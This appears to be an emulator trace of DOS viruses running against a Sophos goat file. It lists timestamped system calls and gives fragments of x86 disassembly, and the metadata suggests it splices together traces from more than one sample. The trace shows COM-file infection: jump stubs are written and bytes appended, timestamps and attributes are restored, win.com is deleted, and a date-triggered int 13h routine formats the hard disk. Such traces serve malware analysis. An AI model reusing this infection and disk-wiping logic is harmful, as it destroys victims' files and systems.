2018-12-25T12:22:20.543387907Z 79 PC: 13ea5 | Find next file (See above)
2018-12-25T12:22:20.547999614Z 61 PC: 13eb1 | Open file (See above)
2018-12-25T12:22:20.556037225Z 63 PC: 13ec0 | Read file or device (See above)
2018-12-25T12:22:20.564309931Z 66 PC: 13ed9 | Move file pointer (See above)
2018-12-25T12:22:20.567333644Z 64 PC: 13eee | Write file or device (See above)
2018-12-25T12:22:20.57141596Z 64 PC: 13ef9 | Write file or device (See above)
2018-12-25T12:22:20.581643796Z 66 PC: 13f02 | Move file pointer (See above)
2018-12-25T12:22:20.585536179Z 64 PC: 13f24 | Write file or device (See above)
2018-12-25T12:22:20.594573249Z 62 PC: 13e99 | Close file (See above)
2018-12-25T12:22:20.605806914Z 79 PC: 13ea5 | Find next file (See above)
2018-12-25T12:22:20.609950407Z 61 PC: 13eb1 | Open file (See above)
2018-12-25T12:22:20.617696238Z 63 PC: 13ec0 | Read file or device (See above)
2018-12-25T12:22:20.625501786Z 66 PC: 13ed9 | Move file pointer (See above)
2018-12-25T12:22:20.627881913Z 64 PC: 13eee | Write file or device (See above)
2018-12-25T12:22:20.634105654Z 64 PC: 13ef9 | Write file or device (See above)
2018-12-25T12:22:20.643566239Z 66 PC: 13f02 | Move file pointer (See above)
2018-12-25T12:22:20.6456961Z 64 PC: 13f24 | Write file or device (See above)
2018-12-25T12:22:20.655547108Z 62 PC: 13e99 | Close file (See above)
2018-12-25T12:22:20.666750349Z 79 PC: 13ea5 | Find next file (See above)
2018-12-25T12:22:20.670746223Z 61 PC: 13eb1 | Open file (See above)
2018-12-25T12:22:20.679903825Z 63 PC: 13ec0 | Read file or device (See above)
2018-12-25T12:22:20.688036817Z 66 PC: 13ed9 | Move file pointer (See above)
2018-12-25T12:22:20.690103459Z 64 PC: 13eee | Write file or device (See above)
2018-12-25T12:22:20.699755558Z 64 PC: 13ef9 | Write file or device (See above)
2018-12-25T12:22:20.70929458Z 66 PC: 13f02 | Move file pointer (See above)
2018-12-25T12:22:20.711045162Z 64 PC: 13f24 | Write file or device (See above)
2018-12-25T12:22:20.715070471Z 62 PC: 13e99 | Close file (See above)
2018-12-25T12:22:20.725012987Z 79 PC: 13ea5 | Find next file (See above)
2018-12-25T12:22:20.732737146Z 26 PC: 13e7b | Set disk transfer address
2018-12-25T12:22:20.734881772Z 9 PC: 12a85 | Display string (String= 'Sophos Ltd, Oxford sacrificial COM goat 1400H bytes long ')
2018-12-25T12:22:20.742081151Z 0 PC: 12a89 | Program terminate

{"DateBased":true,"Day":6,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":9008,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:22:19.293697204Z 26 PC: 147b3 | Set disk transfer address
2018-12-25T12:22:19.295404868Z 250 PC: 147bb | UNKNOWN!
2018-12-25T12:22:19.304326773Z 71 PC: 147c6 | Get current directory
2018-12-25T12:22:19.306338701Z 25 PC: 147ca | Get default drive
2018-12-25T12:22:19.307225367Z 78 PC: 147e2 | Find first file
2018-12-25T12:22:19.311484067Z 61 PC: 147f0 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:22:19.31860245Z 66 PC: 14803 | Move file pointer
2018-12-25T12:22:19.320149487Z 62 PC: 148d3 | Close file
2018-12-25T12:22:19.322352448Z 79 PC: 148db | Find next file
2018-12-25T12:22:19.324994175Z 61 PC: 147f0 | Open file (See above)
2018-12-25T12:22:19.332079135Z 66 PC: 14803 | Move file pointer (See above)
2018-12-25T12:22:19.333995447Z 62 PC: 148d3 | Close file (See above)
2018-12-25T12:22:19.335310021Z 79 PC: 148db | Find next file (See above)
2018-12-25T12:22:19.337140485Z 61 PC: 147f0 | Open file (See above)
2018-12-25T12:22:19.351515667Z 66 PC: 14803 | Move file pointer (See above)
2018-12-25T12:22:19.352932396Z 62 PC: 148d3 | Close file (See above)
2018-12-25T12:22:19.354695443Z 79 PC: 148db | Find next file (See above)
2018-12-25T12:22:19.357921544Z 61 PC: 147f0 | Open file (See above)
2018-12-25T12:22:19.364977051Z 66 PC: 14803 | Move file pointer (See above)
2018-12-25T12:22:19.366356507Z 62 PC: 148d3 | Close file (See above)
2018-12-25T12:22:19.368549891Z 79 PC: 148db | Find next file (See above)
2018-12-25T12:22:19.37139394Z 61 PC: 147f0 | Open file (See above)
2018-12-25T12:22:19.37858353Z 66 PC: 14803 | Move file pointer (See above)
2018-12-25T12:22:19.380188544Z 62 PC: 148d3 | Close file (See above)
2018-12-25T12:22:19.382758752Z 79 PC: 148db | Find next file (See above)
2018-12-25T12:22:19.385442118Z 61 PC: 147f0 | Open file (See above)
2018-12-25T12:22:19.392480808Z 66 PC: 14803 | Move file pointer (See above)
2018-12-25T12:22:19.394248598Z 62 PC: 148d3 | Close file (See above)
2018-12-25T12:22:19.395655323Z 79 PC: 148db | Find next file (See above)
2018-12-25T12:22:19.397871931Z 61 PC: 147f0 | Open file (See above)
2018-12-25T12:22:19.40245058Z 66 PC: 14803 | Move file pointer (See above)
2018-12-25T12:22:19.403751125Z 62 PC: 148d3 | Close file (See above)
2018-12-25T12:22:19.405000652Z 79 PC: 148db | Find next file (See above)
2018-12-25T12:22:19.407503802Z 61 PC: 147f0 | Open file (See above)
2018-12-25T12:22:19.41763353Z 66 PC: 14803 | Move file pointer (See above)
2018-12-25T12:22:19.418809419Z 66 PC: 14824 | Move file pointer
2018-12-25T12:22:19.420334042Z 63 PC: 14834 | Read file or device (Read 4 bytes on handle 5)
2018-12-25T12:22:19.424765804Z 62 PC: 148d3 | Close file (See above)
2018-12-25T12:22:19.426000458Z 79 PC: 148db | Find next file (See above)
2018-12-25T12:22:19.428063134Z 59 PC: 148f7 | Change current directory
2018-12-25T12:22:19.431051035Z 62 PC: 148b0 | Close file
2018-12-25T12:22:19.433108204Z 26 PC: 148b7 | Set disk transfer address
2018-12-25T12:22:19.436186317Z 59 PC: 148bf | Change current directory
2018-12-25T12:22:19.441532447Z 26 PC: 145e2 | Set disk transfer address
2018-12-25T12:22:19.443154898Z 71 PC: 14682 | Get current directory
2018-12-25T12:22:19.447684177Z 78 PC: 145f1 | Find first file
2018-12-25T12:22:19.454690389Z 61 PC: 14604 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:22:19.467402292Z 63 PC: 14610 | Read file or device (Read 3 bytes on handle 5)
2018-12-25T12:22:19.47449794Z 66 PC: 14630 | Move file pointer
2018-12-25T12:22:19.476162165Z 64 PC: 1463d | Write file or device (Write 3 bytes on handle 5)
2018-12-25T12:22:19.47878582Z 66 PC: 14648 | Move file pointer
2018-12-25T12:22:19.48036587Z 64 PC: 14655 | Write file or device (Write 465 bytes on handle 5)
2018-12-25T12:22:19.766453734Z 62 PC: 14659 | Close file
2018-12-25T12:22:19.774779143Z 59 PC: 14661 | Change current directory
2018-12-25T12:22:19.780819109Z 65 PC: 1468e | Delete file (Filename = 'c:\windows\win.com')
2018-12-25T12:22:20.139934548Z 59 PC: 1466e | Change current directory
2018-12-25T12:22:20.142889432Z 26 PC: 14677 | Set disk transfer address
2018-12-25T12:22:20.14476959Z 71 PC: 1441e | Get current directory
2018-12-25T12:22:20.149050619Z 26 PC: 1443d | Set disk transfer address
2018-12-25T12:22:20.150608854Z 78 PC: 14447 | Find first file
2018-12-25T12:22:20.159064747Z 61 PC: 1455c | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:22:20.167911228Z 63 PC: 1456b | Read file or device (Read 4 bytes on handle 5)
2018-12-25T12:22:20.175905999Z 61 PC: 14471 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:22:20.187386452Z 63 PC: 14480 | Read file or device (Read 3 bytes on handle 6)
2018-12-25T12:22:20.194682486Z 66 PC: 1448b | Move file pointer
2018-12-25T12:22:20.196973767Z 44 PC: 14491 | Get time 0x14491: inc dl
0x14493: mov byte ptr [bp + 0x2d9], dl
0x14497: pushaw
0x14498: call 0x243f2
0x1449b: popaw
0x1449c: mov byte ptr [bp + 0x330], 0xe9
0x144a1: mov ax, word ptr [bp + 0x34e]
0x144a5: sub ax, 3
0x144a8: mov word ptr [bp + 0x331], ax
0x144ac: mov word ptr [bp + 0x333], 0x60
0x144b2: mov ah, 0x40
0x144b4: mov cx, 4
0x144b7: lea dx, word ptr [bp + 0x330]
0x144bb: int 0x21
0x144bd: mov ax, 0x4202
0x144c0: xor cx, cx
0x144c2: xor dx, dx
0x144c4: int 0x21
0x144c6: mov ah, 0x40
0x144c8: mov cx, 0x1d6
2018-12-25T12:22:20.199951756Z 64 PC: 144bd | Write file or device (Write 4 bytes on handle 6)
2018-12-25T12:22:20.203456355Z 66 PC: 144c6 | Move file pointer
2018-12-25T12:22:20.205760609Z 64 PC: 144d1 | Write file or device (Write 470 bytes on handle 6)
2018-12-25T12:22:20.214990298Z 42 PC: 144da | Get date 0x144da: cmp dx, 0x71a
0x144de: je 0x1453f
0x144e0: cmp dx, 0xc06
0x144e4: je 0x1453f
0x144e6: lea dx, word ptr [bp + 0x29f]
0x144ea: mov ah, 0x3b
0x144ec: int 0x21
0x144ee: jb 0x144f3
0x144f0: jmp 0x1443d
0x144f3: mov ax, 0x5701
0x144f6: mov dx, word ptr [bp + 0x326]
0x144fa: mov cx, word ptr [bp + 0x324]
0x144fe: int 0x21
0x14500: mov ah, 0x3e
0x14502: int 0x21
0x14504: mov ax, 0x4301
0x14507: lea dx, word ptr [bp + 0x352]
0x1450b: xor ch, ch
0x1450d: mov cl, byte ptr [bp + 0x323]
0x14511: int 0x21
2018-12-25T12:22:20.217655403Z 59 PC: 144ee | Change current directory
2018-12-25T12:22:20.22481307Z 87 PC: 14500 | Get or set file date and time
2018-12-25T12:22:20.226814831Z 62 PC: 14504 | Close file
2018-12-25T12:22:20.236147671Z 67 PC: 14513 | Get or set file attributes
2018-12-25T12:22:20.248704172Z 59 PC: 1451b | Change current directory
2018-12-25T12:22:20.253294623Z 26 PC: 14527 | Set disk transfer address
2018-12-25T12:22:20.255070137Z 37 PC: 14268 | Set interrupt vector (Interrupt = '1' AKA 'Character input')
2018-12-25T12:22:20.257413464Z 37 PC: 1426c | Set interrupt vector (Interrupt = '3' AKA 'Auxiliary input')
2018-12-25T12:22:20.259268479Z 26 PC: 14274 | Set disk transfer address
2018-12-25T12:22:20.260796552Z 71 PC: 14281 | Get current directory
2018-12-25T12:22:20.264589366Z 42 PC: 14286 | Get date 0x14286: cmp dl, 6
0x14289: jne 0x142ad
0x1428b: mov ax, 0x500
0x1428e: mov cx, 0
0x14291: mov dh, 0
0x14293: mov dl, 0x80
0x14295: int 0x13
0x14297: jb 0x1425a
0x14299: mov ah, 9
0x1429b: lea dx, word ptr [si + 0x27d]
0x1429f: int 0x21
0x142a1: nop
0x142a2: jmp 0x142a1
0x142a4: mov cx, 0x4eb
0x142a7: jmp 0x142a5
0x142a9: cli
0x142aa: jmp 0x142a0
0x142ac: iret
0x142ad: lea dx, word ptr [si + 0x25c]
0x142b1: xor cx, cx
2018-12-25T12:22:20.269559968Z 62 PC: 1434c | Close file
2018-12-25T12:22:20.271481447Z 59 PC: 14354 | Change current directory
2018-12-25T12:22:20.273831505Z 26 PC: 1435b | Set disk transfer address
2018-12-25T12:22:20.276470881Z 48 PC: 1404a | Get DOS version
2018-12-25T12:22:20.278077713Z 47 PC: 14056 | Get disk transfer address
2018-12-25T12:22:20.279676603Z 26 PC: 14063 | Set disk transfer address
2018-12-25T12:22:20.282295635Z 78 PC: 140d6 | Find first file
2018-12-25T12:22:20.289673764Z 67 PC: 1411a | Get or set file attributes
2018-12-25T12:22:20.296942772Z 67 PC: 14128 | Get or set file attributes
2018-12-25T12:22:20.308823491Z 61 PC: 14130 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:22:20.316931604Z 87 PC: 1413c | Get or set file date and time
2018-12-25T12:22:20.318854768Z 44 PC: 14146 | Get time 0x14146: mov ah, 0x3f
0x14148: mov cx, 3
0x1414b: lea dx, word ptr [si + 0x13]
0x1414e: int 0x21
0x14150: jb 0x14199
0x14152: cmp ax, 3
0x14155: jne 0x14199
0x14157: mov ax, 0x4202
0x1415a: xor cx, cx
0x1415c: xor dx, dx
0x1415e: int 0x21
0x14160: jb 0x14199
0x14162: mov cx, ax
0x14164: sub ax, 3
0x14167: mov word ptr [si + 0x17], ax
0x1416a: add cx, 0x2bd
0x1416e: mov word ptr [si - 0x1bc], cx
0x14172: mov ah, 0x40
0x14174: mov cx, 0x1e1
0x14177: nop
2018-12-25T12:22:20.322397825Z 63 PC: 14150 | Read file or device (Read 3 bytes on handle 6)
2018-12-25T12:22:20.326470119Z 66 PC: 14160 | Move file pointer
2018-12-25T12:22:20.328371475Z 64 PC: 1417e | Write file or device (Write 481 bytes on handle 6)
2018-12-25T12:22:20.337788999Z 66 PC: 1418d | Move file pointer
2018-12-25T12:22:20.340552952Z 64 PC: 14199 | Write file or device (Write 3 bytes on handle 6)
2018-12-25T12:22:20.344063819Z 87 PC: 141aa | Get or set file date and time
2018-12-25T12:22:20.346143357Z 62 PC: 141ae | Close file
2018-12-25T12:22:20.357050579Z 67 PC: 141b9 | Get or set file attributes
2018-12-25T12:22:20.368841473Z 26 PC: 141c4 | Set disk transfer address
2018-12-25T12:22:20.370627083Z 26 PC: 13e67 | Set disk transfer address
2018-12-25T12:22:20.373114117Z 78 PC: 13ea5 | Find first file
2018-12-25T12:22:20.380354309Z 61 PC: 13eb1 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:22:20.388056658Z 63 PC: 13ec0 | Read file or device (Read 4 bytes on handle 6)
2018-12-25T12:22:20.392049988Z 66 PC: 13ed9 | Move file pointer
2018-12-25T12:22:20.394254319Z 64 PC: 13eee | Write file or device (Write 4 bytes on handle 6)
2018-12-25T12:22:20.398142402Z 64 PC: 13ef9 | Write file or device (Write 481 bytes on handle 6)
2018-12-25T12:22:20.407583259Z 66 PC: 13f02 | Move file pointer
2018-12-25T12:22:20.410213374Z 64 PC: 13f24 | Write file or device (Write 4 bytes on handle 6)
2018-12-25T12:22:20.413571321Z 62 PC: 13e99 | Close file
2018-12-25T12:22:20.422759082Z 79 PC: 13ea5 | Find next file (See above)
2018-12-25T12:22:20.426938271Z 61 PC: 13eb1 | Open file (See above)
2018-12-25T12:22:20.435166242Z 63 PC: 13ec0 | Read file or device (See above)
2018-12-25T12:22:20.442496368Z 66 PC: 13ed9 | Move file pointer (See above)
2018-12-25T12:22:20.445182651Z 64 PC: 13eee | Write file or device (See above)
2018-12-25T12:22:20.448694834Z 64 PC: 13ef9 | Write file or device (See above)
2018-12-25T12:22:20.451994326Z 66 PC: 13f02 | Move file pointer (See above)
2018-12-25T12:22:20.454546844Z 64 PC: 13f24 | Write file or device (See above)
2018-12-25T12:22:20.457992448Z 62 PC: 13e99 | Close file (See above)
2018-12-25T12:22:20.466680712Z 79 PC: 13ea5 | Find next file (See above)
2018-12-25T12:22:20.470058213Z 61 PC: 13eb1 | Open file (See above)
2018-12-25T12:22:20.478325202Z 63 PC: 13ec0 | Read file or device (See above)
2018-12-25T12:22:20.485673769Z 66 PC: 13ed9 | Move file pointer (See above)
2018-12-25T12:22:20.487534448Z 64 PC: 13eee | Write file or device (See above)
2018-12-25T12:22:20.491761059Z 64 PC: 13ef9 | Write file or device (See above)
2018-12-25T12:22:20.501329137Z 66 PC: 13f02 | Move file pointer (See above)
2018-12-25T12:22:20.503174394Z 64 PC: 13f24 | Write file or device (See above)
2018-12-25T12:22:20.511546013Z 62 PC: 13e99 | Close file (See above)
2018-12-25T12:22:20.521124089Z 79 PC: 13ea5 | Find next file (See above)
2018-12-25T12:22:20.524359366Z 61 PC: 13eb1 | Open file (See above)
2018-12-25T12:22:20.540678159Z 63 PC: 13ec0 | Read file or device (See above)
2018-12-25T12:22:20.548096416Z 66 PC: 13ed9 | Move file pointer (See above)
2018-12-25T12:22:20.550078317Z 64 PC: 13eee | Write file or device (See above)
2018-12-25T12:22:20.553921554Z 64 PC: 13ef9 | Write file or device (See above)
2018-12-25T12:22:20.563757639Z 66 PC: 13f02 | Move file pointer (See above)
2018-12-25T12:22:20.565666088Z 64 PC: 13f24 | Write file or device (See above)
2018-12-25T12:22:20.573789142Z 62 PC: 13e99 | Close file (See above)
2018-12-25T12:22:20.58313241Z 79 PC: 13ea5 | Find next file (See above)
2018-12-25T12:22:20.58643292Z 61 PC: 13eb1 | Open file (See above)
2018-12-25T12:22:20.594995858Z 63 PC: 13ec0 | Read file or device (See above)
2018-12-25T12:22:20.603186803Z 66 PC: 13ed9 | Move file pointer (See above)
2018-12-25T12:22:20.60516688Z 64 PC: 13eee | Write file or device (See above)
2018-12-25T12:22:20.609303907Z 64 PC: 13ef9 | Write file or device (See above)
2018-12-25T12:22:20.618685753Z 66 PC: 13f02 | Move file pointer (See above)
2018-12-25T12:22:20.620629216Z 64 PC: 13f24 | Write file or device (See above)
2018-12-25T12:22:20.629305363Z 62 PC: 13e99 | Close file (See above)
2018-12-25T12:22:20.638652083Z 79 PC: 13ea5 | Find next file (See above)
2018-12-25T12:22:20.641977324Z 61 PC: 13eb1 | Open file (See above)
2018-12-25T12:22:20.649983784Z 63 PC: 13ec0 | Read file or device (See above)
2018-12-25T12:22:20.65834794Z 66 PC: 13ed9 | Move file pointer (See above)
2018-12-25T12:22:20.66031111Z 64 PC: 13eee | Write file or device (See above)
2018-12-25T12:22:20.664430594Z 64 PC: 13ef9 | Write file or device (See above)
2018-12-25T12:22:20.674599929Z 66 PC: 13f02 | Move file pointer (See above)
2018-12-25T12:22:20.676602327Z 64 PC: 13f24 | Write file or device (See above)
2018-12-25T12:22:20.685078972Z 62 PC: 13e99 | Close file (See above)
2018-12-25T12:22:20.696968605Z 79 PC: 13ea5 | Find next file (See above)
2018-12-25T12:22:20.700375677Z 61 PC: 13eb1 | Open file (See above)
2018-12-25T12:22:20.708092055Z 63 PC: 13ec0 | Read file or device (See above)
2018-12-25T12:22:20.716724497Z 66 PC: 13ed9 | Move file pointer (See above)
2018-12-25T12:22:20.718734406Z 64 PC: 13eee | Write file or device (See above)
2018-12-25T12:22:20.722106902Z 64 PC: 13ef9 | Write file or device (See above)
2018-12-25T12:22:20.732264274Z 66 PC: 13f02 | Move file pointer (See above)
2018-12-25T12:22:20.734238438Z 64 PC: 13f24 | Write file or device (See above)
2018-12-25T12:22:20.741952786Z 62 PC: 13e99 | Close file (See above)
2018-12-25T12:22:20.752488175Z 79 PC: 13ea5 | Find next file (See above)
2018-12-25T12:22:20.756650395Z 61 PC: 13eb1 | Open file (See above)
2018-12-25T12:22:20.76486293Z 63 PC: 13ec0 | Read file or device (See above)
2018-12-25T12:22:20.773398835Z 66 PC: 13ed9 | Move file pointer (See above)
2018-12-25T12:22:20.775679232Z 64 PC: 13eee | Write file or device (See above)
2018-12-25T12:22:20.783923712Z 64 PC: 13ef9 | Write file or device (See above)
2018-12-25T12:22:20.793988999Z 66 PC: 13f02 | Move file pointer (See above)
2018-12-25T12:22:20.796341156Z 64 PC: 13f24 | Write file or device (See above)
2018-12-25T12:22:20.799931408Z 62 PC: 13e99 | Close file (See above)
2018-12-25T12:22:20.810406121Z 79 PC: 13ea5 | Find next file (See above)
2018-12-25T12:22:20.816020167Z 26 PC: 13e7b | Set disk transfer address
2018-12-25T12:22:20.819876762Z 9 PC: 12a85 | Display string (String= 'Sophos Ltd, Oxford sacrificial COM goat 1400H bytes long ')
2018-12-25T12:22:20.827913702Z 0 PC: 12a89 | Program terminate